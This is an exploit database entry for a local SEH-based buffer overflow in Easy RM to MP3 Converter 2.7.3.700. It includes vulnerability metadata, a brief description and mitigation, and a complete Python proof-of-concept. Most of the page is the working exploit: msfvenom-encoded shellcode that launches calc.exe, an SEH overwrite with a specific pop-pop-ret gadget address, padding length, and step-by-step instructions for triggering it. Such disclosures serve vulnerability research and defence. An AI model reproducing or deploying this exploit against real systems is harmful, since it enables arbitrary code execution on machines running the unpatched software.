Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)

vendor:

Easy RM to MP3 Converter

by:

Felipe Winsnes

7.5

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: Easy RM to MP3 Converter

Affected Version From: 2.7.3.700

Affected Version To: 2.7.3.700

Patch Exists: NO

Related CWE:

CPE: a:easy_rm_to_mp3_converter:easy_rm_to_mp3_converter:2.7.3.700

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 (x86)

2020

Easy RM to MP3 Converter 2.7.3.700 – ‘Input’ Local Buffer Overflow (SEH)

This exploit takes advantage of a local buffer overflow vulnerability in Easy RM to MP3 Converter version 2.7.3.700. By running a Python script and copying the generated content to the clipboard, an attacker can trigger the overflow when pasting the content into the 'Input' parameter of the application. This allows the attacker to execute arbitrary code and potentially gain control of the affected system.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, users are advised to avoid using the Easy RM to MP3 Converter version 2.7.3.700 or to use alternative software.

Source

Exploit-DB raw data:

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- If the 'Preferences' windows pops up, just click 'Cancel'
# 4.- Click 'Batch'
# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there
# 6.- Select OK
# 7.- Some Windows message boxes will pop up, click OK.
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/

import struct
import sys

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
# Payload size: 447 bytes

buf =  b""
buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52"
buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65"
buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b"
buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72"
buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61"
buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66"
buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47"
buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72"
buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31"
buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e"
buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59"
buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c"
buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71"
buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33"
buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d"
buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74"
buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b"
buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75"
buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64"
buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53"
buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b"
buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c"
buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30"
buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58"
buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58"
buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45"
buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70"
buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62"
buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53"
buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75"
buf += b"\x35\x57\x70\x41\x41"

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)

buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200

try:
    f = open ("poc.txt", "w")
    f.write(buffer)
    f.close()
    print "[+] The file has been created successfully!"

except:
    print "[!] There has been an error while creating the file."